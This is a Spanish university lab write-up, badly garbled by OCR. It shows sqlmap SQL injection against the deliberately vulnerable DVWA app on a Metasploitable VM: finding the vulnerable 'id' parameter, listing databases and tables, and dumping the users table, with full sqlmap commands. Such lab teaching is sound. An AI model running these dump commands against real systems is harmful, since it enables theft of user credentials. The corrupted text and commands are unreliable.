SQL INJECTION

 Asignatura  Análisis de  vulnerabilidades Datos del alumno alumno Fecha  Apellidos: Nombre:  Acc t i v i d a d e s

Views 324 Downloads 3 File size 540KB

Report DMCA / Copyright

DOWNLOAD FILE

Recommend stories

Citation preview

 Asignatura  Análisis de  vulnerabilidades

Datos del alumno alumno

Fecha

 Apellidos: Nombre:

 Acc t i v i d a d e s  A Trabajo: Realizar ataques SQL Injection contra la aplicación D!A  "n la si#uiente actividad deber$s realizar diversos ataques sobre la aplicación D!A  utilizando la t%cnica de SQL injection& 'ara ello( debes utilizar la )erramienta )erramienta SQL*ap +instalada en ,ali por de-ecto.& Se valora valorar$ r$ posit positiva ivamen mente te que e/pli e/plique quess debida debidamen mente te los pasos pasos se#uid se#uidos os para para la realización de cada ataque& Tendr$s que: 0 Indicar cu$l1cu$les son los par$metros vulnerables vulnerables de la 2RL& 0 3btener los nombres de las bases de datos disponibles& 0 Recuperar los nombres de las tablas de la base de datos dv4a& 0 Recuperar el contenido de las tablas de la base de datos dv4a& Extensión máxima: 56 máxima: 56 p$#inas +7eor#ia 55 e interlineado 5(8.&

TEMA 3 – Actividades

9 2niversidad Internacional Internacional de La Rioja( S& A& +2NIR.

 Asignatura  Análisis de  vulnerabilidades

Datos del alumno

Fecha

 Apellidos: Nombre:

Solución Para el desarrollo de la solución utilizaremos un entorno virtual con dos máquinas virtuales, siendo la primera la maquina victima (Metasploitable) ya que tiene configurada la aplicación DV! y como maquina atacante ("ali #inu$) la misma que tiene instalado %&#M!P'

Primero comprobamos que tanto la maquina atacante como la victima estn en la misma red'

TEMA 3 – Actividades

9 2niversidad Internacional de La Rioja( S& A& +2NIR.

 Asignatura  Análisis de  vulnerabilidades

Datos del alumno

Fecha

 Apellidos: Nombre:

Desde la maquina atacante accedemos a un navegador eb de preferencia *irefo$ y digitamos la direccion de la maquina victima para el caso +-'+./'-'+. y seleccionamos la aplicación DV!'

%e mostrara la siguiente pantalla las credenciales por defecto son0 1surio0 admin Passord0 passord

Prepararemos el nivel de seguridad de la plataforma DV!, para facilitar el entorno de ataque situándolo en seguridad ba2a'

TEMA 3 – Actividades

9 2niversidad Internacional de La Rioja( S& A& +2NIR.

 Asignatura  Análisis de  vulnerabilidades

Datos del alumno

Fecha

 Apellidos: Nombre:

ndicar cuál!cuáles son los "arámetros vulnerables de la #$%& Para identificar los parámetros vulnerables de la 13# 4acemos clic en el men5 lateral en la opción 6%&# 72ection8 y seguidamente en el botón %ubmit'

!l 4acer clic en el botón %ubmit nuestra 13# cambia ya que utiliza el metodo 9:;  para obtener la información ingresada y muestra el parametro vulnerable 6id8

TEMA 3 – Actividades

9 2niversidad Internacional de La Rioja( S& A& +2NIR.

 Asignatura  Análisis de  vulnerabilidades

Datos del alumno

Fecha

 Apellidos: Nombre:

'btener los nombres de las bases de datos dis"onibles& !gent y las >coo?ieG8 securityGlo P=P%:%%7DGaFb+AdeF+FA+-FHA.c/.cbHHI+bcII8 >u J4ttp0@@+-'+./'-'+.@dva@vulnerabilities@sqli@KidG+>L3%ubmitG%ubmitNJ >>dbs

!l finalizar la e2ecución nos mostrara información sobre el sistema operativo, motor de  base de datos y la lista de bases disponibles'

TEMA 3 – Actividades

9 2niversidad Internacional de La Rioja( S& A& +2NIR.

 Asignatura  Análisis de  vulnerabilidades

Datos del alumno

Fecha

 Apellidos: Nombre:

$ecu"erar los nombres de las tablas de la base de datos dv(a& Para recuperar las tablas de la base de datos dva al comando utilizado en el punto anterior le cambiamos ciertos parámetros sqlmap >>4eadersG8 Mozilla@A'B (C++ #inu$ $/.E.F rv0.+'B) 9ec?o@-B+BB+B+ *irefo$@.+'B8 >>coo?ieG8 securityGlo P=P%:%%7DGaFb+AdeF+FA+-FHA.c/.cbHHI+bcII8 >u J4ttp0@@+-'+./'-'+.@dva@vulnerabilities@sqli@KidG+>L3%ubmitG%ubmitNJ >D dva >>tables

!l finalizar la e2ecución nos retorna la información que necesitamos'

$ecu"erar el contenido de las tablas de la base de datos dv(a& De similar forma para este punto cambiaremos parte del comando del punto + agregando los parámetros que se muestran a continuación' ;abla guestboo?  sqlmap >>4eadersG8 Mozilla@A'B (C++ #inu$ $/.E.F rv0.+'B) 9ec?o@-B+BB+B+ *irefo$@.+'B8 >>coo?ieG8 securityGlo P=P%:%%7DGaFb+AdeF+FA+-FHA.c/.cbHHI+bcII8 >u J4ttp0@@+-'+./'-'+.@dva@vulnerabilities@sqli@KidG+>L3%ubmitG%ubmitNJ >>dump >>batc4 >; guestboo? >D dva

TEMA 3 – Actividades

9 2niversidad Internacional de La Rioja( S& A& +2NIR.

 Asignatura  Análisis de  vulnerabilidades

Datos del alumno

Fecha

 Apellidos: Nombre:

:speramos que finalice la e2ecucion de la instrucción nos retorna'

;abla users sqlmap >>4eadersG8 Mozilla@A'B (C++ #inu$ $/.E.F rv0.+'B) 9ec?o@-B+BB+B+ *irefo$@.+'B8 >>coo?ieG8 securityGlo P=P%:%%7DGaFb+AdeF+FA+-FHA.c/.cbHHI+bcII8 >u J4ttp0@@+-'+./'-'+.@dva@vulnerabilities@sqli@KidG+>L3%ubmitG%ubmitNJ >>dump >>batc4 >; users >D dva

!l finalizar nos retorna la tabla con los datos de los usuarios como se muestra a continuación'

 )eri*icación de usuarios obtenidos' 1tilizamos uno de los usuarios obtenidos en el punto anterior en la pantalla de login de la aplicación'

TEMA 3 – Actividades

9 2niversidad Internacional de La Rioja( S& A& +2NIR.

 Asignatura  Análisis de  vulnerabilidades

Datos del alumno

Fecha

 Apellidos: Nombre:

+arámetros S,%Ma" utili-ados >> 4eaders >> coo?ie >> dbs >D >> tables >> dump >> batc4 >;

:ncabezados adicionales Valor del encabezado 4ttp coo?ie :numerar bases de datos DLM% Lase de datos DLM% para enumerar   :numerar tablas de base de datos DLM% Volcado de DLM% Ounca solicite la entrada del usuario, usar predeterminado ;abla (s) de base de datos DLM% para enumerar  

TEMA 3 – Actividades

9 2niversidad Internacional de La Rioja( S& A& +2NIR.